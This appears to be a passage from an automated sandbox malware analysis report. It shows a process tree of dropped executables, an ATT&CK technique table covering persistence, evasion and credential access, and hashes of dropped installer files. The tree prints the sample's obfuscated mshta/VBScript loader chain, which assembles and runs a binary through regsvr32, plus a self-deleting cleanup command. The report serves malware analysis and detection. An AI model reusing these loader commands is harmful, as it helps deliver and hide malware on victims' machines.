                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4E23.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4E23.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4132
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5364.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5364.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3404
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\56C0.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\56C0.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5412
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\56C0.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\56C0.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:6004
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2208
                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4516
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:2264
                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2672
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5384
                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:2676
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2904
                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:5516
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2208
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3B21.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\3B21.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:3928
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 3B21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3B21.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:6332
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                taskkill /im 3B21.exe /f
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                PID:5176
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                PID:7124
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4C49.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4C49.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:6888
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vBSCriPt: cLOSe (cReateobjEct ( "wsCRIpt.sHeLl" ). RUn ( "CMd.exe /q /C TYPE ""C:\Users\Admin\AppData\Local\Temp\4C49.exe"" > RZKZUBuDNKOQ.eXe&&STaRt RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho & if """" == """" for %w IN ( ""C:\Users\Admin\AppData\Local\Temp\4C49.exe"") do taskkill /IM ""%~NXw"" -F " ,0, TRue ) )
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:6216
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /q /C TYPE "C:\Users\Admin\AppData\Local\Temp\4C49.exe" > RZKZUBuDNKOQ.eXe&&STaRt RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho & if "" == "" for %w IN ( "C:\Users\Admin\AppData\Local\Temp\4C49.exe") do taskkill /IM "%~NXw" -F
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:6636
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe
                                                                                                                                                                                                                                                        RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:3908
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vBSCriPt: cLOSe (cReateobjEct ( "wsCRIpt.sHeLl" ). RUn ( "CMd.exe /q /C TYPE ""C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe"" > RZKZUBuDNKOQ.eXe&&STaRt RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho & if ""/PBxNLCk3z93w2BqdEhU0B3H2ho "" == """" for %w IN ( ""C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe"") do taskkill /IM ""%~NXw"" -F " ,0, TRue ) )
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:5480
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /q /C TYPE "C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe" > RZKZUBuDNKOQ.eXe&&STaRt RZKZuBuDnkoq.exe /PBxNLCk3z93w2BqdEhU0B3H2ho & if "/PBxNLCk3z93w2BqdEhU0B3H2ho " == "" for %w IN ( "C:\Users\Admin\AppData\Local\Temp\RZKZUBuDNKOQ.eXe") do taskkill /IM "%~NXw" -F
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:4752
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbsCRiPt: CloSe ( cReateoBJEct ( "wScripT.shell"). RuN ( "cMD /Q/c eCHo C:\Users\Admin\AppData\Local\TempFG> hSLc.6Y& eCHO | Set /p = ""MZ"" > 0BbRee.K & COPy /B /Y 0BBRee.K +8nFYNjX6.9+ 33FD.x5 + VxcQXO.XO+Da1D3UK3.B + 7l6cpBxI.Go + hSLC.6Y Z1XU1YiD.Ay & staRt regsvr32 /S .\Z1Xu1yID.aY " , 0 , TRUe ) )
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:7112
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q/c eCHo C:\Users\Admin\AppData\Local\TempFG> hSLc.6Y& eCHO | Set /p = "MZ" >0BbRee.K & COPy /B /Y 0BBRee.K +8nFYNjX6.9+ 33FD.x5 + VxcQXO.XO+Da1D3UK3.B + 7l6cpBxI.Go + hSLC.6Y Z1XU1YiD.Ay & staRt regsvr32 /S .\Z1Xu1yID.aY
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:5708
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:400
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>0BbRee.K"
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                            PID:2788
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                            regsvr32 /S .\Z1Xu1yID.aY
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:2372
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                        taskkill /IM "4C49.exe" -F
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                        PID:864

                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1197

                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1197

                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1018

                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\libcurl.dll
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\libcurlpp.dll
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\libstdc++-6.dll
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\libwinpthread-1.dll
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\setup_install.exe
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\setup_install.exe
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_1.exe
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_1.exe
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_1.txt
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_2.exe
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_2.txt
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_3.exe
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_3.txt
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_4.exe
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_4.txt
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_5.exe
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_5.txt
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_6.exe
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4363E04\sonia_6.txt
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                                                  SHA512

